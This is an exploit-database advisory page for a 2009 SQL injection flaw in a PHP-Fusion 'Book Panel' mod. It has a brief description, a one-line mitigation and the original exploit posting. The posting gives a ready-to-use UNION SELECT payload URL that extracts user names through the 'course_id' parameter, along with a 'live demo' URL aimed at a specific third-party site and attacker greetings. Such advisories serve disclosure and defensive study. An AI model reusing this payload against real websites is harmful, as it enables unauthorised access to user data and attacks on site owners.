PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability

vendor:

PHP-Fusion Mod - Book Panel

by:

SuB-ZeRo

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-Fusion Mod - Book Panel

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-Fusion Mod – Book Panel Remote SQL Injection Vulnerability

A vulnerability exists in the PHP-Fusion Mod - Book Panel, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the 'course_id' parameter in 'index.php' is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow execution of arbitrary SQL commands.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in order to prevent SQL injection attacks.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
exploit :
http://www.milw0rm.com/exploits/8182
home : http://www.security-dz.com / soon mirror attack for sub-z3ro
contacte : FbH@hotmail.com
exploited by: SuB-ZeRo
Greetings: x.CJP.x & AnGeL25Dz
-------------------------------------------------------------------------------------------------------------------------------------
Exploit:

http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--

   live demo :
http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--

# milw0rm.com [2009-03-10]